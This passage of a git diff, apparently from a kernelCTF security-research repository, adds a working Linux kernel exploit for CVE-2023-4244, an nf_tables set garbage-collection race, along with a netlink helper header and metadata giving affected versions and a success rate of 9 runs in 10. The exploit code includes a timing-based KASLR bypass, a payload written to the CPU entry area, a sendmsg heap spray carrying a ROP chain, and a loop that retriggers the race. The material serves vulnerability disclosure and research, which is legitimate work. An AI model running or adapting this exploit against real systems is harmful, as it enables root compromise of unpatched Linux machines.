table1_name); + nftnl_set_set_str(set_elem_trigger, NFTNL_SET_NAME, trig_set_name); + + struct nftnl_set_elem * elem1 = nftnl_set_elem_alloc(); + + nftnl_set_elem_set(elem1, NFTNL_SET_ELEM_KEY, &key_data, key_size); + nftnl_set_elem_set_str(elem1, NFTNL_SET_ELEM_CHAIN, trig_chain_name); + nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_VERDICT, NFT_GOTO); + nftnl_set_elem_set_u64(elem1, NFTNL_SET_ELEM_TIMEOUT, 2); + + 
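/* A timeout of 2 (milliseconds on the netlink wire) plus NFTNL_SET_GC_INTERVAL = 1 above makes the element expire almost immediately, so the rbtree GC worker races the NFT_MSG_DELSET sent later in this function. */ + 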
nftnl_set_elem_add(set_elem_trigger, elem1); + + struct nftnl_rule * rule_dummy_rop = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dummy_rop, NFTNL_RULE_CHAIN, chain_rop_name); + + struct nftnl_rule * rule_dummy = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dummy, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dummy, NFTNL_RULE_CHAIN, chain_base_name); + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + for(int i = 0 ; i < 0x400; i++){ + nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++); + nftnl_rule_nlmsg_build_payload(nlh, rule_dummy_rop); + mnl_nlmsg_batch_next(batch); + } + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++); + nftnl_set_elems_nlmsg_build_payload(nlh, set_elem_trigger); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, family, 0, seq++); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + // wait for nft_commit_release() to complete + usleep(100*1000); + + del_chain(trig_chain_name); + + // wait for nft_commit_release() to complete + usleep(100*1000); +} + +void setup(){ + new_ns(); + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + err(1, "mnl_socket_open"); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + portid = mnl_socket_get_portid(nl); +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { +uint64_t a, d; +asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); +a = (d<<32) | a; +return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { +uint64_t a, d; +asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); +a = (d<<32) | a; +return a; +} + +void prefetch(void* p) +{ +asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ +size_t time = rdtsc_begin(); +prefetch(addr); +size_t delta = rdtsc_end() - time; +return delta; +} + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +int bypass_kaslr(uint64_t base) { + if (!base) { + #ifdef KASLR_BYPASS_INTEL 
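+ // Intel variant: prefetch candidate kernel-text addresses at 16 MiB steps and + // take the fastest one (a mapped address prefetches quickly); seven scans + // then majority-vote on the base.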
+ #define OFFSET 0 + #define START (0xffffffff81000000ull + OFFSET) + #define END (0xffffffffD0000000ull + OFFSET) + #define STEP 0x0000000001000000ull + while (1) { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #else + #define START (0xffffffff81000000ull) + #define END (0xffffffffc0000000ull) + #define STEP 0x0000000000200000ull + #define NUM_TRIALS 7 + // largest contiguous mapped area at the beginning of _stext + #define WINDOW_SIZE 11 + + while (1) { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } + #endif + } + +got_base: + printf("using kernel base %llx\n", base); + + kbase = base; + + return 0; +} + +static void sig_handler(int s) {} + +static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) { +asm volatile ( + "mov %0, %%rsp\n" + "pop %%r15\n" + "pop %%r14\n" + "pop %%r13\n" + "pop %%r12\n" + "pop %%rbp\n" + "pop %%rbx\n" + "pop %%r11\n" + "pop %%r10\n" + "pop %%r9\n" + "pop %%r8\n" + "pop %%rax\n" + "pop %%rcx\n" + "pop %%rdx\n" + "pop %%rsi\n" + "pop %%rdi\n" + "divq (0x1234000)\n" + "1:\n" + "jmp 1b\n" + : : "r"(payload) +); +__builtin_unreachable(); +} + +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { +if (fork()) { + return; +} + +struct 
cpu_entry_area_payload payload = {}; +payload.nft_expr_eval = kbase + PUSH_RBX_POP_RSP; + +set_affinity(1); +signal(SIGFPE, sig_handler); +signal(SIGTRAP, sig_handler); +signal(SIGSEGV, sig_handler); +setsid(); + +write_cpu_entry_area(&payload); +} + +#define MSG_SIZE 0x2010 + +void spray_sendmsg() { + char buf[MSG_SIZE]; + struct msghdr msg = {0}; + struct sockaddr_in addr = {0}; + int sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + rop_chain((uint64_t*) buf); + + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_family = AF_INET; + addr.sin_port = htons(6666); + + msg.msg_control = buf; + msg.msg_controllen = MSG_SIZE; + msg.msg_name = (caddr_t)&addr; + msg.msg_namelen = sizeof(addr); + + set_affinity(0); + + sendmsg(sockfd, &msg, 0); +} + +void start(){ + save_state(); + + bypass_kaslr(0); + + setup_cpu_entry_area(); + + set_affinity(0); + + buf = malloc(BUF_SIZE); + + while(1){ + setup(); + + setup_table_chain(); + + trigger(set_rop_name, chain_rop_name); + + spray_sendmsg(); + + trig_sock(); + } +} + +int main(int argc, char ** argv) +{ + start(); + + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h new file mode 100644 index 00000000..ce994bdf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h @@ -0,0 +1,229 @@ +/* + * Utils used to communicate with the kernel via Netlink. + * Useful for static linking. + * (Header names below were lost in extraction; reconstructed from usage.) + */ + +#include <stdlib.h> +#include <string.h> +#include <unistd.h> +#include <linux/netlink.h> + +#define PAGE_SIZE 0x1000 +#define NL_AUTO_SEQ 0 +#define NL_AUTO_PID 0 + +void *nlmsg_tail(const struct nlmsghdr *msg) +{ + return (unsigned char *)msg + NLMSG_ALIGN(msg->nlmsg_len); +} + +void *nlmsg_data(const struct nlmsghdr *msg) +{ + return NLMSG_DATA(msg); +} + +int nlmsg_datalen(const struct nlmsghdr *msg) +{ + return msg->nlmsg_len - NLMSG_HDRLEN; +} + +struct nlmsghdr *nlmsg_alloc(void) +{ + struct nlmsghdr *msg; + + msg = calloc(1, 0x1000); + if (!msg) + return NULL; + + msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0)); + return msg; +} + +struct nlmsghdr *nlmsg_init(int type, int flags) +{ + struct nlmsghdr *msg; + + msg = nlmsg_alloc(); + if (!msg) + return NULL; + + msg->nlmsg_type = type; + msg->nlmsg_flags = flags; + msg->nlmsg_seq = NL_AUTO_SEQ; + msg->nlmsg_pid = NL_AUTO_PID; + + return msg; +} + +void nlmsg_free(struct nlmsghdr *msg) +{ + free(msg); +} + +int nl_init_request(int type, struct nlmsghdr **msg, int flags) +{ + int sk; + struct nlmsghdr *n; + + sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sk < 0) + return -1; + + n = nlmsg_init(type, flags); + if (!n) { + close(sk); + return -1; + } + + *msg = n; + return sk; +} + +void *nlmsg_reserve(struct nlmsghdr *msg, size_t len, int pad) +{ + char *data = (char *)msg; + size_t tlen; + + tlen = NLMSG_ALIGN(len); + data += msg->nlmsg_len; + msg->nlmsg_len += tlen; + + if (tlen > len) + memset(data + len, 0, tlen - len); + + return data; +} + +int nlmsg_append(struct nlmsghdr *msg, void *data, size_t len, int pad) +{ + void *tmp; + + tmp = nlmsg_reserve(msg, len, pad); + if (tmp == NULL) + return -1; + + memcpy(tmp, data, len); + return 0; +} + +int nl_sendmsg(int sk, struct nlmsghdr *msg) +{ + struct iovec iov = {}; + struct msghdr hdr = {}; + + if (sk < 0) + return -1; + + iov.iov_base = (void *)msg; + /* + * Here we add NLMSG_GOODSIZE (0xec0) to the total message length + * to be sure the msg in 
netlink_alloc_large_skb() is allocated using vmalloc(): + * https://elixir.bootlin.com/linux/v6.1/source/net/netlink/af_netlink.c#L1190 + * Useful to reduce noise in kmalloc-512 slabs. + */ + iov.iov_len = msg->nlmsg_len + 0xec0; + + hdr.msg_name = NULL; + hdr.msg_namelen = sizeof(struct sockaddr_nl); + hdr.msg_iov = &iov; + hdr.msg_iovlen = 1; + + return sendmsg(sk, &hdr, 0); +} + +int nl_complete_request(int sock, struct nlmsghdr *msg) +{ + int ret; + + ret = nl_sendmsg(sock, msg); + nlmsg_free(msg); + close(sock); + + return ret; +} + +void *nla_data(const struct nlattr *nla) +{ + return (char *)nla + NLA_HDRLEN; +} + +int nla_attr_size(int payload) +{ + return NLA_HDRLEN + payload; +} + +int nla_total_size(int payload) +{ + return NLA_ALIGN(nla_attr_size(payload)); +} + +int nla_padlen(int payload) +{ + return nla_total_size(payload) - nla_attr_size(payload); +} + +struct nlattr *nla_reserve(struct nlmsghdr *msg, int attrtype, int attrlen) +{ + struct nlattr *nla; + + nla = (struct nlattr *)nlmsg_tail(msg); + nla->nla_type = attrtype; + nla->nla_len = nla_attr_size(attrlen); + + memset((unsigned char *) nla + nla->nla_len, 0, nla_padlen(attrlen)); + + msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + nla_total_size(attrlen); + return nla; +} + +int nla_put(struct nlmsghdr *msg, int attrtype, int datalen, const void *data) +{ + struct nlattr *nla; + + nla = nla_reserve(msg, attrtype, datalen); + if (!nla) + return -1; + + memcpy(nla_data(nla), data, datalen); + return 0; +} + +int nla_put_u32(struct nlmsghdr *msg, int attrtype, uint32_t value) +{ + return nla_put(msg, attrtype, sizeof(uint32_t), &value); +} + +int nla_put_string(struct nlmsghdr *msg, int attrtype, const char *str) +{ + return nla_put(msg, attrtype, strlen(str) + 1, str); +} + +int nla_put_nested(struct nlmsghdr *msg, int attrtype, const struct nlmsghdr *nested) +{ + return nla_put(msg, attrtype, nlmsg_datalen(nested), nlmsg_data(nested)); +} + +struct nlattr *nla_nest_start(struct nlmsghdr *msg, int attrtype) +{ + struct nlattr *start = (struct nlattr *)nlmsg_tail(msg); + + if (nla_put(msg, NLA_F_NESTED | attrtype, 0, NULL) < 0) + return NULL; + + return start; +} + +int nla_nest_end(struct nlmsghdr *msg, struct nlattr *start) +{ + size_t pad, len; + + len = (char *)nlmsg_tail(msg) - (char *)start; + start->nla_len = len; + + pad = NLMSG_ALIGN(msg->nlmsg_len) - msg->nlmsg_len; + if (pad > 0) { + if (!nlmsg_reserve(msg, pad, 0)) + return -1; + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json new file mode 100644 index 00000000..2c233d9d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp190" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26", + "cve": "CVE-2023-4244", + "affected_versions": [ + "6.4 - 6.5-rc5" + ], + "requirements": { + "attack_surface": [ + "userns" + ], + "capabilities": [ + "CAP_NET_ADMIN" + ], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "mitigation-v3-6.1.55": { + "uses": [ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds in 9 out of 10 runs" + } + } +} \ No newline at end of file diff --git 
a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz new file mode 100644 index 00000000..755b68b6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/original.tar.gz differ